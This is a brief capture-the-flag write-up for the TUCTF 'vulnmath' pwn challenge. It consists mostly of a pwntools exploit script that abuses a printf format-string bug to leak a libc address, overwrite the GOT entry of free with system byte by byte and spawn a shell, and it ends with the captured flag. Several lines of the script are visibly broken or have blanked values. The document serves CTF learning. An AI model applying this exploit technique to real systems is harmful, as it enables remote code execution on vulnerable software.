PWN - Points: 500
Enter the belly of the beast and emerge victorious.
nc 30502
Exploit format strings with printf
and leak a pointer to libc
and overwrite the GOT
entry of free
with system
function byte-by-byte with four format strings.
Exploit script:
from pwn import *
libc = ELF('')
e = ELF('vulnmath')
# context.terminal = ['termite', '-e']
# p = gdb.debug('./vulnmath')
# p = process('vulnmath')
p = remote('', 30502)
p.sendlineafter('> ', '%23$x')
print p.recvline()
libc_base = int(p.recvline()[:-1], 16) - 0x1EFB9'libc base: {}'.format(hex(libc_base)))
system = libc_base + libc.symbols['system']
payload = fmtstr_payload(6, {['free']: system & 0xFF}, write_size='int')
p.sendlineafter('> ', payload)
payload = fmtstr_payload(6, {['free']+1: system >> 8 & 0xFF}, write_size='int')
p.sendlineafter('> ', payload)
payload = fmtstr_payload(6, {['free']+2: system >> 16 & 0xFF}, write_size='int')
p.sendlineafter('> ', payload)
payload = fmtstr_payload(6, {['free']+3: system >> 24 & 0xFF}, write_size='int')
p.sendlineafter('> ', payload)
p.sendlineafter('> ', 'sh\x00')
flag: TUCTF{I_w45_w4rn3d_4b0u7_pr1n7f..._bu7_I_d1dn'7_l1573n}